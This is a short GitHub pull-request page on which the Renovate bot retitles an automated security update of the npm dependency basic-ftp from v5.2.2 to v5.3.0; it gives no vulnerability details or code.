@renovate renovate Bot force-pushed the renovate/npm-basic-ftp-vulnerability branch from cdab592 to 7622709 Compare April 17, 2026 01:54
@renovate renovate Bot changed the title Update dependency basic-ftp to v5.2.2 [SECURITY] Update dependency basic-ftp to v5.3.0 [SECURITY] Apr 17, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants